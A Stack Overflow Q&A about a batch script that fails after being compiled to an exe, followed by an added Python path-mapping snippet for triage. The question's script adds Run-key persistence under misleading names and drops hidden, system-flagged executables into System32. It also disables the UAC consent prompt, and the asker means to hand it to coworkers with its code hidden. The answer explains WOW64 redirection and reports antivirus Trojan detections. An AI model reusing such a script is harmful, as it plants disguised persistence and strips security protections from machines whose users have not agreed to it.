Question
This issue is eating my brains out. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attributes +S +R +H to them, adds two programs to startup via the registry and disables UAC, as I need it frequently, like 3x a day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting then my code is not worth copying but my mates are also not the brightest bulbs!
My issue is that when I convert it to an exe using Quick Batch Convertor, the moment it becomes an exe it starts giving an Access denied error, only when it gets to copying the files into %SYSTEMROOT%, even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which originally should require admin privileges. It's only the copying of files that gives access denied when converted into an exe. They all just work fine if it is in the form of a batch. I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter, because I have converted many files using this converter and they worked flawlessly.
The code for my batch is here:
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
Any Suggestions?
Answer 1:
This answer does not resolve your problem; it's intended as an explanation of the strangely unusual behaviour of the compiled script.
The described issue is not solvable with this 32-bit Quick Batch File Compiler. For proof, create a batch script battoexeTest.bat containing
@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause
Output (elevated; note that I have redirected user's %temp% and %tmp% variables):
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat"
ExecutablePath=C:\Windows\System32\cmd.exe
If you run the compiled version of the above script, batToExeTestY.exe, elevated, the output would change as follows:
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe
You can see that batToExeTestY.exe
- creates a copy of original batch script with some random name 8YQTO48H.bat in temporary directory of account SYSTEM, see CommandLine;
- runs that batch file in 32bit command line, see ExecutablePath.
- hence, 32-bitness proved.
Read File System Redirector chapter in MSDN article Running 32-bit Applications:
"The %windir%\System32 directory is reserved for 64-bit applications. … In most cases, whenever a 32-bit application attempts to access %windir%\System32, the access is redirected to %windir%\SysWOW64 …"
Example: run attrib under 64-bit command line prompt (C:\Windows\system32\cmd.exe) regardless of elevated or not:
==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A R C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A SHR C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt
If you run attrib or dir under 32-bit command line prompt, then WOW redirector
- displays C:\Windows\system32\SystemSettingsUpdate file directory although
- shows files located in %SYSTEMROOT%\sysWOW64\SystemSettingsUpdate one.
Take a look:
==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A R C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016 12:25 <DIR> .
01.03.2016 12:25 <DIR> ..
01.03.2015 12:31 5 120 WOW-cliParser.exe
26.02.2016 08:54 84 WOW-HL~Realtime~Defense.txt
Moreover, when trying to run your batch script (slightly adapted for testing purposes and then compiled) elevated, AVG Internet Security Ultimate complains in its Resident Shield:
"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"
and on copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate" line and/or on attrib lines in its Identity Protection module:
"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""
Could be a false positive, but you definitely need to use some virus-free and 64-bit-compliant bat to exe converter…
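For triage, the redirection shown in the answer can be modelled as a path mapping: given a path as a process names it and that process's bitness, where does the file actually live on disk? This is an added example, not code from the question or the answer; `real_path` and its parameters are hypothetical names, the exemption list follows Microsoft's File System Redirector documentation, and the sample paths are constructed from the ones shown above.

```python
import ntpath  # Windows path rules, usable on any OS for offline triage

# System32 subdirectories that Microsoft documents as exempt from redirection.
EXEMPT = ("catroot", "catroot2", "driverstore", r"drivers\etc", "logfiles", "spool")


def _is_under(path, root):
    """True if path equals root or lies below it (case-insensitive)."""
    p, r = path.lower(), root.lower()
    return p == r or p.startswith(r + "\\")


def real_path(path, process_bits, windir=r"C:\Windows"):
    """Map a path as named by a process to its on-disk location (64-bit Windows)."""
    path = ntpath.normpath(path)
    if process_bits == 64:
        return path  # 64-bit processes are not redirected
    system32 = ntpath.join(windir, "System32")
    sysnative = ntpath.join(windir, "Sysnative")
    syswow64 = ntpath.join(windir, "SysWOW64")
    if _is_under(path, sysnative):
        # Sysnative is an alias only 32-bit processes see; it names the real System32.
        return system32 + path[len(sysnative):]
    if not _is_under(path, system32):
        return path  # outside System32: untouched by this rule
    for sub in EXEMPT:
        if _is_under(path, ntpath.join(system32, sub)):
            return path
    return syswow64 + path[len(system32):]


if __name__ == "__main__":
    # Constructed samples: (bitness of the process, path as the process wrote it).
    samples = [
        (64, r"C:\Windows\system32\SystemSettingsUpdate\cliParser.exe"),
        (32, r"C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe"),
        (32, r"C:\Windows\System32\drivers\etc\hosts"),
        (32, r"C:\Windows\Sysnative\cmd.exe"),
    ]
    for bits, named in samples:
        print(f"{bits}-bit  {named}  ->  {real_path(named, bits)}")
```

When reviewing a host, this is why a file that a 32-bit process reports under `system32` has to be looked for under `SysWOW64`, as the `attrib` and `dir` listings in the answer show.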
Source: https://stackoverflow.com/questions/35635431/having-troubles-with-batch-files